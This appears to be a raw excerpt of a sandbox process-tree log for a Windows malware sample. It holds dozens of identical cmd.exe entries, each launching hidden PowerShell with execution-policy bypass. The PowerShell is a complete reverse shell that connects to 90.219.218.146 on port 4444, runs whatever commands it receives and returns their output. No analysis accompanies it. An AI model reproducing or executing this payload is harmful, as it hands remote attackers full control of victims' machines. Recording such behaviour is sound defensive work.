C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3348
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:804
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3508
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4284
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4256
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1088
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:756
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:748
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3808
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3176
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1664
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2364
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4836
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3348
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1012
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:840
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2860
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4308
-
-
